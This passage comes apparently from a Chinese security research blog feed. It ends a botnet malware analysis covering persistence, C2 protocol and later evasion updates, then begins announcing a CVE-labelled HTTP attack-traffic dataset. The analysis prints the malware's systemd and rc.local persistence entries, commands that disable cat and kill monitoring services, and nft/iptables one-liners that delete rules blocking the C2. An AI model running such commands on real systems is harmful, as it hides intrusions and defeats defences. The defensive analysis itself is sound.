<p>&#x901A;&#x8FC7;&#x6302;&#x8F7D;&#x64CD;&#x4F5C;&#xFF0C;&#x9690;&#x85CF;&#x6216;&#x9694;&#x79BB;&#x5F53;&#x524D;&#x548C;&#x5B50;&#x8FDB;&#x7A0B;&#x5728;<code>/proc</code>&#x4E0B;&#x7684;&#x4FE1;&#x606F;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/hide_self.png" alt="hide_self.png" loading="lazy"></p>
<pre><code>/proc/[PID] -&gt; /tmp
</code></pre>
<h3 id="%E6%8C%81%E4%B9%85%E5%8C%96">&#x6301;&#x4E45;&#x5316;</h3>
<p>&#x590D;&#x5236;&#x81EA;&#x8EAB;&#x5230;<code>/sbin/gots</code>&#x548C;<code>/usr/bin/%s</code></p>
<p>&#x4E0B;&#x6587;&#x4E2D;&#x7684;<code>%s</code>&#x4E3A;&#x6587;&#x4EF6;&#x540D;&#xFF0C;<code>botid</code>&#x4E3A;&#x6837;&#x672C;&#x8FD0;&#x884C;&#x7684;&#x7B2C;&#x4E00;&#x4E2A;&#x53C2;&#x6570;&#xFF0C;&#x5982;&#x679C;&#x65E0;&#x53C2;&#x6570;&#x9ED8;&#x8BA4;&#x4E3A;<code>x86</code></p>
<ol>
<li>&#x5728;<code>/etc/systemd/system/%s.service</code>&#x4E0B;&#x521B;&#x5EFA;&#x670D;&#x52A1;</li>
</ol>
<pre><code>[Unit]\nDescription=AutoStart Service
After=network-online.target
Requires=network-online.target

[Service]
Type=oneshot
ExecStart= /usr/bin/%s botid
RemainAfterExit=yes
Restart=no

[Install]
WantedBy=multi-user.target
</code></pre>
<ol start="2">
<li>&#x901A;&#x8FC7;<code>/etc/rc.d/rc.local</code>&#x548C;<code>/etc/rc.local</code>&#x5B9E;&#x73B0;&#x6301;&#x4E45;&#x5316;</li>
</ol>
<pre><code>
# AutoStart
/sbin/gots botid &amp;
</code></pre>
<h3 id="c2%E4%B8%8E%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE">C2&#x4E0E;&#x7F51;&#x7EDC;&#x534F;&#x8BAE;</h3>
<p>&#x968F;&#x673A;&#x9009;&#x62E9;&#x786C;&#x7F16;&#x7801;&#x5728;&#x6837;&#x672C;&#x4E2D;&#x7684;<code>45.95.*.*</code>&#x6216;&#x8005;&#x5B57;&#x7B26;&#x4E32;&#x8868;&#x4E2D;&#x7684;<code>aura.kabot[.icu</code>&#x4F5C;&#x4E3A;C2</p>
<p>&#x4ECE;4&#x4E2A;&#x7AEF;&#x53E3;&#x4E2D;&#x968F;&#x673A;&#x9009;&#x62E9;&#x4E00;&#x4E2A;&#x8FDE;&#x63A5;&#xFF1A;<code>3489, 5098, 6608, 7489</code></p>
<p>&#x660E;&#x6587;&#x6D88;&#x606F;&#x683C;&#x5F0F;:</p>
<pre><code class="language-go">type Message{
    msgType uint8 
    pLen    uint16 
    padding uint16
    randLen uint16
    randByte []byte
    paylaoad []byte
}
</code></pre>
<p>&#x6D88;&#x606F;&#x7C7B;&#x578B;&#x548C;&#x6240;&#x4EE3;&#x8868;&#x7684;&#x529F;&#x80FD;</p>
<table>
<thead>
<tr>
<th>msgType</th>
<th>desc</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>DDoS</td>
</tr>
<tr>
<td>2</td>
<td>task done</td>
</tr>
<tr>
<td>3</td>
<td>ping</td>
</tr>
<tr>
<td>4</td>
<td>handshake</td>
</tr>
<tr>
<td>5</td>
<td>botid</td>
</tr>
<tr>
<td>6</td>
<td>login</td>
</tr>
<tr>
<td>7</td>
<td>pong</td>
</tr>
<tr>
<td>8</td>
<td>exec cmd</td>
</tr>
</tbody>
</table>
<p>&#x534F;&#x8BAE;&#x57FA;&#x4E8E;ChaCha20&#x7B97;&#x6CD5;&#x5B9E;&#x73B0;&#x3002;&#x5176;&#x6838;&#x5FC3;&#x7279;&#x5F81;&#x5728;&#x4E8E;&#x53CC;&#x5411;&#x72EC;&#x7ACB;&#x7684;&#x6301;&#x4E45;&#x5316;&#x6D41;&#x72B6;&#x6001;&#xFF0C;&#x914D;&#x5408;&#x786C;&#x7F16;&#x7801;&#x5BC6;&#x94A5;&#x8FDB;&#x884C;&#x521D;&#x59CB;&#x4F1A;&#x8BDD;&#x534F;&#x5546;&#x3002;</p>
<p>&#x534F;&#x8BAE;&#x4EA4;&#x4E92;&#x5206;&#x4E3A;&#x56DB;&#x4E2A;&#x5173;&#x952E;&#x9636;&#x6BB5;&#xFF1A;</p>
<ol>
<li>&#x521D;&#x59CB;&#x4E0A;&#x7EBF;<br>
Bot &#x7AEF;&#x4E3B;&#x52A8;&#x53D1;&#x8D77;&#xFF0C;&#x53D1;&#x9001;&#x660E;&#x6587;&#x4E0A;&#x7EBF;&#x5305;&#x3002;</li>
</ol>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/rand_bug.png" alt="rand_bug.png" loading="lazy"><br>
&#x7531;&#x4E8E;&#x968F;&#x673A;&#x51FD;&#x6570;&#x4EE3;&#x7801;bug&#xFF0C;&#x5BFC;&#x81F4;&#x6D88;&#x606F;&#x7684;&#x968F;&#x673A;&#x6570;&#x636E;&#x957F;&#x5EA6;&#x4E3A;0&#x540C;&#x65F6;&#x4E0A;&#x7EBF;&#x5305;&#x65E0;payload&#xFF0C;&#x56E0;&#x6B64;&#x4E0A;&#x7EBF;&#x5305;hex&#x4E3A;</p>
<pre><code>06 00 00 00 00 00 00
</code></pre>
<ol start="2">
<li>&#x5BC6;&#x94A5;&#x534F;&#x5546;&#x4E0E; Nonce &#x5206;&#x53D1;<br>
&#x7531;&#x670D;&#x52A1;&#x7AEF;&#x751F;&#x6210;&#x968F;&#x673A;&#x7684;&#x5355;&#x5BC6;&#x94A5;&#x548C;&#x53CC;Nonce&#xFF0C;&#x5E76;&#x91C7;&#x7528;&#x4E86;&#x4E8C;&#x6B21;&#x52A0;&#x5BC6;&#xFF1A;</li>
</ol>
<p>Session Key &#x4FDD;&#x62A4;&#xFF1A;&#x4F7F;&#x7528;32 &#x5B57;&#x8282; Key &#x8FDB;&#x884C; XOR &#x8FD0;&#x7B97;&#x540E;&#x53D1;&#x51FA;&#x3002;</p>
<p>&#x53CC; Nonce &#x673A;&#x5236;&#xFF1A;&#x670D;&#x52A1;&#x7AEF;&#x4E0B;&#x53D1;&#x4E24;&#x4E2A;&#x4E0D;&#x540C;&#x7684; Nonce&#xFF1A;</p>
<p>NonceA&#xFF1A;&#x7528;&#x4E8E; Bot &#x7AEF;&#x53D1;&#x9001;&#x6570;&#x636E;&#x52A0;&#x5BC6;&#xFF08;&#x670D;&#x52A1;&#x7AEF;&#x89E3;&#x5BC6;&#xFF09;&#x3002;</p>
<p>NonceB&#xFF1A;&#x7528;&#x4E8E;&#x670D;&#x52A1;&#x7AEF;&#x53D1;&#x9001;&#x6570;&#x636E;&#x52A0;&#x5BC6;&#xFF08;Bot &#x7AEF;&#x89E3;&#x5BC6;&#xFF09;&#x3002;</p>
<ol start="3">
<li>&#x63E1;&#x624B;&#x9A8C;&#x8BC1;<br>
&#x8FD9;&#x662F;&#x786E;&#x4FDD; XOR &#x89E3;&#x5BC6;&#x540E;&#x7684; Session Key &#x6B63;&#x786E;&#x6027;&#x7684;&#x5173;&#x952E;&#x6B65;&#x9AA4;&#xFF1A;</li>
</ol>
<p>Bot &#x9A8C;&#x8BC1;&#xFF1A;Bot &#x4F7F;&#x7528;&#x89E3;&#x51FA;&#x7684;Key&#x548C;NonceA&#x52A0;&#x5BC6;<code>handshake</code>&#x6D88;&#x606F;&#x53D1;&#x5F80;&#x670D;&#x52A1;&#x7AEF;&#x3002;</p>
<p>&#x670D;&#x52A1;&#x7AEF;&#x9A8C;&#x8BC1;&#xFF1A;&#x670D;&#x52A1;&#x7AEF;&#x89E3;&#x5BC6;&#x5E76;&#x6BD4;&#x5BF9;&#x6D88;&#x606F;&#x7C7B;&#x578B;&#xFF0C;&#x82E5;&#x6B63;&#x786E;&#x5219;&#x4F7F;&#x7528;Key&#x548C;NonceB&#x56DE;&#x590D;&#x52A0;&#x5BC6;&#x54CD;&#x5E94;&#x3002;</p>
<p>&#x72B6;&#x6001;&#x540C;&#x6B65;&#xFF1A;Bot&#x89E3;&#x5BC6;&#x54CD;&#x5E94;&#xFF0C;&#x82E5;&#x6210;&#x529F;&#xFF0C;&#x5219;&#x53CC;&#x65B9;&#x5EFA;&#x7ACB;&#x4E92;&#x4FE1;&#x3002;</p>
<ol start="4">
<li>&#x786E;&#x8BA4;&#x5206;&#x7EC4;&#x4E0E;&#x6307;&#x4EE4;&#x5FAA;&#x73AF;<br>
Bot&#x52A0;&#x5BC6;&#x53D1;&#x9001;<code>botid</code>&#x6D88;&#x606F;&#xFF0C;&#x670D;&#x52A1;&#x7AEF;&#x53EF;&#x6839;&#x636E;&#x8BE5;ID&#x5BF9;Bot&#x8FDB;&#x884C;&#x5206;&#x7EC4;</li>
</ol>
<p>&#x6301;&#x7EED;&#x901A;&#x4FE1;&#xFF1A;&#x8FDB;&#x5165;&#x6307;&#x4EE4;&#x5FAA;&#x73AF;&#x9636;&#x6BB5;&#xFF0C;Bot &#x6301;&#x7EED;&#x76D1;&#x542C;&#x670D;&#x52A1;&#x7AEF;&#x4E0B;&#x53D1;&#x7684;&#x52A0;&#x5BC6;&#x6307;&#x4EE4;&#x3002;</p>
<h3 id="%E9%9A%90%E8%97%8Fddos%E8%A1%8C%E4%B8%BA">&#x9690;&#x85CF;DDoS&#x884C;&#x4E3A;</h3>
<p>&#x5728;&#x63A5;&#x6536;&#x5230;DDoS&#x6307;&#x4EE4;&#x65F6;&#xFF0C;&#x8FD8;&#x4F1A;&#x6267;&#x884C;&#x4EE5;&#x4E0B;&#x6307;&#x4EE4;</p>
<pre><code>mv /usr/bin/cat /usr/bin/cat2
pkill -f &apos;network_service|resmon_service
</code></pre>
<p>&#x8FD9;&#x610F;&#x5473;&#x7740;&#x5728;&#x8FDB;&#x884C;DDoS&#x65F6;&#xFF0C;&#x65E0;&#x6CD5;&#x4F7F;&#x7528;&#x7CFB;&#x7EDF;&#x7684;cat&#x547D;&#x4EE4;&#x548C;&#x7F51;&#x7EDC;&#x8D44;&#x6E90;&#x76D1;&#x63A7;&#x670D;&#x52A1;&#xFF0C;&#x4EE5;&#x6B64;&#x6765;&#x9690;&#x85CF;DDoS&#x884C;&#x4E3A;</p>
<h1 id="%E5%AF%B9%E6%8A%97">&#x5BF9;&#x6297;</h1>
<p>&#x53D1;&#x73B0;&#x95EE;&#x9898;&#x540E;&#xFF0C;&#x5B98;&#x65B9;&#x548C;&#x90E8;&#x5206;&#x7528;&#x6237;&#x53D1;&#x5E03;&#x4E86;&#x89E3;&#x51B3;&#x65B9;&#x6848;/&#x811A;&#x672C;&#xFF0C;&#x4F46;&#x5728;1&#x6708;31&#x65E5;&#x8BE5;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x518D;&#x6B21;&#x66F4;&#x65B0;&#x7EC4;&#x4EF6;&#x8FDB;&#x884C;&#x5BF9;&#x6297;</p>
<ol>
<li>&#x5220;&#x9664;nft&#x548C;iptable&#x4E2D;&#x5220;&#x9664;&#x963B;&#x6B62;C2&#x8FDE;&#x63A5;&#x7684;&#x89C4;&#x5219;</li>
</ol>
<pre><code>nft list ruleset -a | grep C2IP | sed -n &apos;s/.*table \\([^ ]*\\) \\([^ ]*\\).*handle \\([0-9]*\\).*/nft delete rule \\1 \\2 handle \\3/p&apos; | sh
iptables -t filter -S | grep C2IP | sed &apos;s/^-A/-D/&apos; | sh
iptables -t nat -S | grep C2IP | sed &apos;s/^-A/-D/&apos; | sh
iptables -t mangle -S | grep C2IP | sed &apos;s/^-A/-D/&apos; | sh
iptables -t raw -S | grep C2IP | sed &apos;s/^-A/-D/&apos; | sh
</code></pre>
<ol start="2">
<li>
<p>&#x4FEE;&#x6539;webshell&#x540E;&#x95E8;&#x7684;&#x7AEF;&#x53E3;&#x4E3A;57199</p>
</li>
<li>
<p>&#x65B0;&#x7684;&#x5185;&#x6838;&#x6301;&#x4E45;&#x5316;&#x6A21;&#x5757;<code>async_memcpys.ko</code></p>
</li>
</ol>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/sys_persist0.png" alt="sys_persist0.png" loading="lazy"><br>
<img src="https://blog.xlab.qianxin.com/content/images/2026/02/sys_persist.png" alt="sys_persist.png" loading="lazy"></p>
<ol start="4">
<li>
<p>&#x65B0;&#x7684;&#x7528;&#x6237;&#x6001;&#x6301;&#x4E45;&#x5316;&#x670D;&#x52A1;<code>/etc/systemd/system/dockers.service</code></p>
</li>
<li>
<p>&#x66F4;&#x6362;&#x65B0;&#x7684;C2&#x57FA;&#x7840;&#x8BBE;&#x65BD;</p>
</li>
<li>
<p>&#x4F7F;&#x7528;&#x52A8;&#x6001;&#x7684;8&#x5B57;&#x8282;KEY&#x5BF9;&#x6837;&#x672C;&#x8FDB;&#x884C;&#x52A0;&#x58F3;&#x4FDD;&#x62A4;</p>
</li>
</ol>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/02/packer.png" alt="packer.png" loading="lazy"></p>
<h1 id="ioc">IoC</h1>
<pre><code>20.89.168.131	Japan|Tokyo|Tokyo	AS8075|Microsoft Corporation

xd.killaurasleep[.top
ak.killaurasleep[.top
aura.kabot[.icu


a5dcff8289d7468f6cd4783a19f4d8d94c76170a
a50bc62f34bff2761d9117c62f172ede4c508bf7
</code></pre>
]]></content:encoded></item><item><title><![CDATA[数据集开放下载：带CVE标签的真实HTTP流量]]></title><description><![CDATA[<p></p><p>&#x6211;&#x4EEC;&#x5F88;&#x9AD8;&#x5174;&#x5730;&#x5BA3;&#x5E03;&#xFF0C;DataCon 2025 &#x5927;&#x6570;&#x636E;&#x5B89;&#x5168;&#x5206;&#x6790;&#x7ADE;&#x8D5B;&#x7684;&#x201C;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x6D41;&#x91CF;&#x8BC6;&#x522B;&#x201D;&#x8D5B;&#x9898;&#x6570;&#x636E;&#x5DF2;&#x7ECF;&#x6B63;&#x5F0F;&#x5F00;&#x653E;&#x4E0B;&#x8F7D;&#x3002;&#x8BE5;&#x6570;&#x636E;&#x96C6;&#x5305;&#x542B;</p>]]></description><link>https://blog.xlab.qianxin.com/shu-ju-ji-kai-fang-xia-zai-dai-cvebiao-qian-de-zhen-shi-httpliu-liang/</link><guid isPermaLink="false">69439898f39f9e0001b23c3b</guid><dc:creator><![CDATA[Zuchao Wang]]></dc:creator><pubDate>Wed, 24 Dec 2025 08:43:44 GMT</pubDate><content:encoded><![CDATA[<p></p><p>&#x6211;&#x4EEC;&#x5F88;&#x9AD8;&#x5174;&#x5730;&#x5BA3;&#x5E03;&#xFF0C;DataCon 2025 &#x5927;&#x6570;&#x636E;&#x5B89;&#x5168;&#x5206;&#x6790;&#x7ADE;&#x8D5B;&#x7684;&#x201C;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x6D41;&#x91CF;&#x8BC6;&#x522B;&#x201D;&#x8D5B;&#x9898;&#x6570;&#x636E;&#x5DF2;&#x7ECF;&#x6B63;&#x5F0F;&#x5F00;&#x653E;&#x4E0B;&#x8F7D;&#x3002;&#x8BE5;&#x6570;&#x636E;&#x96C6;&#x5305;&#x542B;&#x5E26;&#x6709; CVE &#x6807;&#x7B7E;&#x7684;&#x771F;&#x5B9E; HTTP &#x6D41;&#x91CF;&#xFF0C;&#x65E8;&#x5728;&#x4E3A;&#x6F0F;&#x6D1E;&#x68C0;&#x6D4B;&#x548C;&#x7F51;&#x7EDC;&#x5B89;&#x5168;&#x9886;&#x57DF;&#x7684;&#x7814;&#x7A76;&#x4EBA;&#x5458;&#x4E0E;&#x5F00;&#x53D1;&#x8005;&#x63D0;&#x4F9B;&#x9AD8;&#x8D28;&#x91CF;&#x7684;&#x8D44;&#x6E90;&#x3002;</p>
<p>&#x7533;&#x8BF7;&#x4E0B;&#x8F7D;&#x5730;&#x5740;&#xFF1A;<a href="https://www.datacon.org.cn/opendata/openpage?resourcesId=42&amp;ref=blog.xlab.qianxin.com">https://www.datacon.org.cn/opendata/openpage?resourcesId=42</a></p>
<h2 id="%E8%83%8C%E6%99%AF%E4%BB%8B%E7%BB%8D">&#x80CC;&#x666F;&#x4ECB;&#x7ECD;</h2>
<p>&#x968F;&#x7740;&#x7F51;&#x7EDC;&#x5B89;&#x5168;&#x5A01;&#x80C1;&#x65E5;&#x76CA;&#x4E25;&#x5CFB;&#xFF0C;&#x53CA;&#x65F6;&#x8BC6;&#x522B;&#x5E76;&#x54CD;&#x5E94;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x5DF2;&#x6210;&#x4E3A;&#x7F51;&#x7EDC;&#x9632;&#x5FA1;&#x7684;&#x5173;&#x952E;&#x3002;HTTP &#x6D41;&#x91CF;&#x4F5C;&#x4E3A;&#x7F51;&#x7EDC;&#x901A;&#x4FE1;&#x7684;&#x4E3B;&#x8981;&#x8F7D;&#x4F53;&#xFF0C;&#x627F;&#x8F7D;&#x7740;&#x6D77;&#x91CF;&#x5E94;&#x7528;&#x6570;&#x636E;&#x4E0E;&#x6F5C;&#x5728;&#x7684;&#x5B89;&#x5168;&#x98CE;&#x9669;&#x3002;&#x901A;&#x8FC7;&#x6DF1;&#x5165;&#x5206;&#x6790; HTTP &#x6D41;&#x91CF;&#x4E2D;&#x7684;&#x653B;&#x51FB;&#x884C;&#x4E3A;&#xFF0C;&#x53EF;&#x4EE5;&#x6709;&#x6548;&#x63D0;&#x5347;&#x7F51;&#x7EDC;&#x7A7A;&#x95F4;&#x7684;&#x6574;&#x4F53;&#x9632;&#x5FA1;&#x80FD;&#x529B;&#x3002;</p>
<p>&#x7136;&#x800C;&#xFF0C;&#x5F53;&#x524D;&#x516C;&#x5F00;&#x7684;&#x7F51;&#x7EDC;&#x6D41;&#x91CF;&#x6570;&#x636E;&#x96C6;&#x5927;&#x591A;&#x805A;&#x7126;&#x4E8E; DDoS/XSS &#x7B49;&#x901A;&#x7528;&#x653B;&#x51FB;&#x7C7B;&#x578B;&#x8BC6;&#x522B;&#x3001;Stream/P2P &#x7B49;&#x534F;&#x8BAE;&#x7C7B;&#x578B;&#x8BC6;&#x522B;&#x6216; Gmail/Skype &#x7B49;&#x670D;&#x52A1;&#x7C7B;&#x578B;&#x8BC6;&#x522B;&#x3002;&#x4E13;&#x95E8;&#x9488;&#x5BF9;&#x7279;&#x5B9A; CVE &#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x7684; HTTP &#x6D41;&#x91CF;&#x6570;&#x636E;&#x96C6;&#x4ECD;&#x8F83;&#x4E3A;&#x532E;&#x4E4F;&#x3002;&#x672C;&#x6570;&#x636E;&#x96C6;&#x65E8;&#x5728;&#x586B;&#x8865;&#x8FD9;&#x4E00;&#x7A7A;&#x767D;&#xFF0C;&#x63A8;&#x52A8;&#x76F8;&#x5173;&#x6280;&#x672F;&#x7684;&#x53D1;&#x5C55;&#x3002;</p>
<h2 id="%E6%95%B0%E6%8D%AE%E9%9B%86%E6%8F%8F%E8%BF%B0">&#x6570;&#x636E;&#x96C6;&#x63CF;&#x8FF0;</h2>
<p>&#x6570;&#x636E;&#x96C6;&#x5206;&#x4E3A;&#x8BAD;&#x7EC3;&#x96C6;&#x548C;&#x6D4B;&#x8BD5;&#x96C6;&#xFF0C;&#x5206;&#x522B;&#x5B58;&#x50A8;&#x4E8E;&#x4EE5;&#x4E0B;&#x4E24;&#x4E2A;&#x6587;&#x4EF6;&#x4E2D;&#xFF1A;</p>
<ul>
<li><code>train.json.gz</code>: &#x8BAD;&#x7EC3;&#x96C6;&#x6570;&#x636E;</li>
<li><code>test.json.gz</code>: &#x6D4B;&#x8BD5;&#x96C6;&#x6570;&#x636E;</li>
</ul>
<p>&#x4E24;&#x4E2A;&#x6587;&#x4EF6;&#x5747;&#x4E3A; Gzip &#x538B;&#x7F29;&#x7684; JSON Lines &#x683C;&#x5F0F;&#xFF0C;&#x6BCF;&#x884C;&#x4EE3;&#x8868;&#x4E00;&#x4E2A;&#x72EC;&#x7ACB;&#x7684; HTTP &#x4F1A;&#x8BDD;&#x3002;&#x8BAD;&#x7EC3;&#x96C6;&#x5305;&#x542B;&#x7EA6; 4 &#x4E07;&#x6761;&#x4F1A;&#x8BDD;&#xFF0C;&#x6D4B;&#x8BD5;&#x96C6;&#x5305;&#x542B;&#x7EA6; 10 &#x4E07;&#x6761;&#x3002;&#x6BCF;&#x6761;&#x4F1A;&#x8BDD;&#x4EC5;&#x5305;&#x542B;&#x4E00;&#x6761;&#x6216;&#x591A;&#x6761; HTTP &#x8BF7;&#x6C42;&#x7684;&#x539F;&#x6587;&#xFF0C;&#x4E0D;&#x5305;&#x542B; HTTP &#x54CD;&#x5E94;&#x3001;IP &#x5730;&#x5740;&#x3001;&#x7AEF;&#x53E3;&#x53F7;&#x7B49;&#x4EFB;&#x4F55;&#x5176;&#x4ED6;&#x4FE1;&#x606F;&#x3002;&#x6240;&#x6709;&#x8BF7;&#x6C42;&#x5747;&#x4E3A;&#x5BA2;&#x6237;&#x7AEF;&#x5230;&#x670D;&#x52A1;&#x5668;&#x7684;&#x76F4;&#x63A5;&#x8BF7;&#x6C42;&#xFF0C;&#x4E0D;&#x542B;&#x4EE3;&#x7406;&#x6D41;&#x91CF;&#xFF0C;&#x4E14;&#x5747;&#x4E3A;&#x660E;&#x6587;&#xFF0C;&#x672A;&#x8FDB;&#x884C; HTTPS &#x52A0;&#x5BC6;&#x3002;</p>
<p>&#x6BCF;&#x4E2A;&#x4F1A;&#x8BDD;&#xFF08;&#x5373;&#x6BCF;&#x884C; JSON &#x5BF9;&#x8C61;&#xFF09;&#x5305;&#x542B;&#x4EE5;&#x4E0B;&#x5B57;&#x6BB5;&#xFF1A;</p>
<ul>
<li><code>id</code>: &#x4F1A;&#x8BDD;&#x7684;&#x552F;&#x4E00;&#x6807;&#x8BC6;&#x7B26;&#x3002;</li>
<li><code>payload</code>: &#x5305;&#x542B;&#x4E00;&#x6761;&#x6216;&#x591A;&#x6761; HTTP &#x8BF7;&#x6C42;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#x3002;&#x539F;&#x59CB;&#x8BF7;&#x6C42;&#x6587;&#x672C;&#x7ECF;&#x8FC7; zlib &#x538B;&#x7F29;&#x540E;&#xFF0C;&#x518D;&#x901A;&#x8FC7; Base64 &#x7F16;&#x7801;&#x5F97;&#x5230;&#x6B64;&#x5B57;&#x7B26;&#x4E32;&#x3002;</li>
<li><code>labeled</code>: &#x6807;&#x5FD7;&#x4F4D;&#xFF0C;&#x7528;&#x4E8E;&#x533A;&#x5206;&#x4F1A;&#x8BDD;&#x662F;&#x5426;&#x7ECF;&#x8FC7;&#x6807;&#x6CE8;&#x5E76;&#x7528;&#x4E8E;&#x7ADE;&#x8D5B;&#x8BC4;&#x5206;&#x3002;
<ul>
<li><code>1</code>: &#x8868;&#x793A;&#x8BE5;&#x4F1A;&#x8BDD;&#x5DF2;&#x7ECF;&#x8FC7;&#x6807;&#x6CE8;&#xFF0C;&#x662F;&#x8BA1;&#x5206;&#x7684;&#x4E00;&#x90E8;&#x5206;&#x3002;</li>
<li><code>0</code>: &#x8868;&#x793A;&#x8BE5;&#x4F1A;&#x8BDD;&#x672A;&#x7ECF;&#x6807;&#x6CE8;&#xFF0C;&#x4EC5;&#x4F5C;&#x4E3A;&#x80CC;&#x666F;&#x6D41;&#x91CF;&#x3002;</li>
</ul>
</li>
<li><code>cve_labels</code>: CVE &#x6807;&#x7B7E;&#x5B57;&#x7B26;&#x4E32;&#x3002;
<ul>
<li>&#x5BF9;&#x4E8E;&#x5DF2;&#x6807;&#x6CE8;&#x4F1A;&#x8BDD; (<code>labeled: 1</code>)&#xFF1A;&#x6B64;&#x5B57;&#x6BB5;&#x5305;&#x542B;&#x8BC6;&#x522B;&#x51FA;&#x7684; CVE &#x5217;&#x8868;&#x3002;&#x82E5;&#x672A;&#x53D1;&#x73B0; CVE&#xFF0C;&#x5219;&#x4E3A;&#x7A7A;&#x5B57;&#x7B26;&#x4E32;&#xFF1B;&#x82E5;&#x53D1;&#x73B0;&#x4E00;&#x4E2A; CVE&#xFF0C;&#x5219;&#x4E3A;&#x8BE5; CVE &#x7F16;&#x53F7;&#xFF08;&#x5982; <code>CVE-2025-1234</code>&#xFF09;&#xFF1B;&#x82E5;&#x53D1;&#x73B0;&#x591A;&#x4E2A;&#xFF0C;&#x5219;&#x4E3A;&#x7ECF;&#x8FC7;&#x6392;&#x5E8F;&#x548C;&#x53BB;&#x91CD;&#x7684; CVE &#x7F16;&#x53F7;&#x5217;&#x8868;&#xFF0C;&#x4EE5;&#x7A7A;&#x683C;&#x5206;&#x9694;&#xFF08;&#x5982; <code>CVE-2025-1234 CVE-2025-5678</code>&#xFF09;&#x3002;</li>
<li>&#x5BF9;&#x4E8E;&#x80CC;&#x666F;&#x6D41;&#x91CF; (<code>labeled: 0</code>)&#xFF1A;&#x6B64;&#x5B57;&#x6BB5;&#x6052;&#x4E3A;&#x7A7A;&#x5B57;&#x7B26;&#x4E32;&#xFF0C;&#x4F46;&#x4F1A;&#x8BDD;&#x672C;&#x8EAB;&#x4ECD;&#x53EF;&#x80FD;&#x5305;&#x542B;&#x672A;&#x88AB;&#x53D1;&#x73B0;&#x7684;&#x6F0F;&#x6D1E;&#x3002;</li>
</ul>
</li>
</ul>
<p>&#x6570;&#x636E;&#x96C6;&#x4E2D;&#x7EA6;&#x4E00;&#x534A;&#x7684;&#x4F1A;&#x8BDD;&#x88AB;&#x6807;&#x8BB0;&#x4E3A; <code>labeled: 1</code>&#x3002;&#x5728;&#x8FD9;&#x4E9B;&#x5DF2;&#x6807;&#x6CE8;&#x7684;&#x4F1A;&#x8BDD;&#x4E2D;&#xFF0C;&#x4E00;&#x534A;&#x81F3;&#x5C11;&#x5305;&#x542B;&#x4E00;&#x4E2A; CVE &#x6807;&#x7B7E;&#xFF0C;&#x53E6;&#x4E00;&#x534A;&#x5219;&#x4E0D;&#x5305;&#x542B;&#x4EFB;&#x4F55; CVE &#x6807;&#x7B7E;&#x3002;&#x6574;&#x4E2A;&#x6570;&#x636E;&#x96C6;&#x5171;&#x8986;&#x76D6;&#x7EA6; 1000 &#x4E2A;&#x4E0D;&#x540C;&#x7684; CVE &#x7F16;&#x53F7;&#x3002;</p>
<p>&#x6CE8;&#x610F;&#xFF1A;&#x8BE5;&#x6570;&#x636E;&#x96C6;&#x867D;&#x7136;&#x6765;&#x81EA; DataCon 2025 &#x5927;&#x6570;&#x636E;&#x5B89;&#x5168;&#x5206;&#x6790;&#x7ADE;&#x8D5B;&#x201C;&#x6F0F;&#x6D1E;&#x653B;&#x51FB;&#x6D41;&#x91CF;&#x8BC6;&#x522B;&#x201D;&#x8D5B;&#x9898;&#xFF0C;&#x4F46;&#x6211;&#x4EEC;&#x5BF9;&#x6570;&#x636E;&#x505A;&#x4E86;&#x4E00;&#x5B9A;&#x7684;&#x5220;&#x51CF;&#x3002;&#x6211;&#x4EEC;&#x63D0;&#x4F9B;&#x4E0B;&#x8F7D;&#x7684;&#x6570;&#x636E;&#x662F;&#x8D5B;&#x9898;&#x5B9E;&#x9645;&#x4F7F;&#x7528;&#x7684;&#x6570;&#x636E;&#x7684;&#x4E00;&#x4E2A;&#x5B50;&#x96C6;&#xFF0C;&#x5305;&#x542B;&#x4E86;&#x5927;&#x7EA6; 80% &#x7684;&#x4F1A;&#x8BDD;&#x548C; 80% &#x7684; CVE &#x6807;&#x7B7E;&#x3002;</p>
<h3 id="%E6%A0%87%E7%AD%BE%E5%87%86%E7%A1%AE%E6%80%A7">&#x6807;&#x7B7E;&#x51C6;&#x786E;&#x6027;</h3>
<p>&#x672C;&#x6570;&#x636E;&#x96C6;&#x7684;&#x6807;&#x7B7E;&#x7531;&#x81EA;&#x52A8;&#x5316;&#x89C4;&#x5219;&#x751F;&#x6210;&#xFF0C;&#x56E0;&#x6B64;&#x53EF;&#x80FD;&#x5B58;&#x5728;&#x5C11;&#x91CF;&#x6807;&#x6CE8;&#x9519;&#x8BEF;&#xFF0C;&#x6211;&#x4EEC;&#x4F30;&#x8BA1;&#x9519;&#x8BEF;&#x7387;&#x4E0D;&#x8D85;&#x8FC7; 5%&#x3002;&#x5DF2;&#x77E5;&#x7684;&#x6807;&#x6CE8;&#x4E0D;&#x51C6;&#x786E;&#x7684; CVE &#x5982;&#x4E0B;&#xFF1A;</p>
<pre><code class="language-text">CVE-2020-13117 CVE-2014-5137 CVE-2017-12611 CVE-2013-4810 CVE-2022-29349 CVE-2019-10173 CVE-2018-18291 CVE-2014-6278 CVE-2021-25646 CVE-2021-40655 CVE-2025-2775 CVE-2023-43208 CVE-2023-34960 CVE-2019-14322 CVE-2020-13117 CVE-2017-17309
</code></pre>
<h2 id="%E6%95%B0%E6%8D%AE%E7%94%9F%E6%88%90%E6%B5%81%E7%A8%8B">&#x6570;&#x636E;&#x751F;&#x6210;&#x6D41;&#x7A0B;</h2>
